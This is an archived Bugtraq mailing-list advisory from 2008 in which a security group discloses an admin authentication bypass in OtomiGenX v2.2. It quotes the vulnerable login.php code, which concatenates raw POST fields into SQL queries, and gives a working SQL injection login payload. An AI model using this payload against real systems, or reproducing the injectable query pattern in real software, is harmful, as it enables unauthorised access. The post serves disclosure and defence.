| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 1 Jun 2008 00:29:08 -0000
From: hadihadi_zedehal_2006@...oo.com
To: bugtraq@...urityfocus.com
Subject: OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability
######################################################################################
# #
# ...::::: OtomiGenX v2.2 Ultimate Authentication bypass Vulnerabilities ::::.... #
######################################################################################
Virangar Security Team
www.virangar.net
www.virangar.ir
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
----------------
.::::admin Authentication bypass vuln::::.
//vuln code in login.php:
...
..
...
line 29:
$passwd = md5($_POST[userPassword]); // md5 hash password
if($_POST[userType] != 'Staff')
{$sql = "SELECT userID, userName
FROM user_account
WHERE userAccount='$_POST[userAccount]' AND
userPassword='$passwd' AND
userType='$_POST[userType]' AND isApproved='1'";
}else
$sql = "SELECT staffID, staffName, staffGroupID
FROM staff
WHERE staffAccount='$_POST[userAccount]' AND
staffPassword='$passwd'";
...
-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
usertype:staff
--------------
Powered by blists - more mailing lists